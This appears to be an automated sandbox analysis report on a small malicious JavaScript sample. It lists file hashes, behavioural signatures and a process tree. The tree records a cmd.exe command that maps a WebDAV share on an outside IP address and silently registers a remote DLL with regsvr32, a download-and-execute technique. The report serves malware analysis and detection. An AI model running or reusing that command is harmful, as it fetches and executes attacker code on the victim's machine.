Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
21-07-2024 17:42
Static task
static1
Behavioral task
behavioral1
Sample
134186817131725037.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
134186817131725037.js
Resource
win10v2004-20240709-en
General
-
Target
134186817131725037.js
-
Size
6KB
-
MD5
ca514a4370b698d961cece428efc844c
-
SHA1
7bfc74769b720cc10b9a68a40ac22014e78ab76b
-
SHA256
72b2dde1c8f3c378438cd0a5e45812a41f776385689b799fc942fb4eb018a382
-
SHA512
d1126ee4591ad4e26ec92487ef8f6ccb22e3e3d4ad9f1144a0368e7132e8226ef8af91f445778125d2eb8d1868e0706cb62137edb7ba7b830a6cd85a5bc70194
-
SSDEEP
96:ClZz6PhjArxsWzOKjC9f6E0TclfqMwtRPy9ecUgN7kxJOvRgNuLpR+L7owQd1Roj:y5+S9serjnIGNuAkh46u7yFKV
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2720 wrote to memory of 3620 2720 wscript.exe 85 PID 2720 wrote to memory of 3620 2720 wscript.exe 85 PID 3620 wrote to memory of 668 3620 cmd.exe 87 PID 3620 wrote to memory of 668 3620 cmd.exe 87
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\134186817131725037.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\20372662426754.dll2⤵
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:668
-
-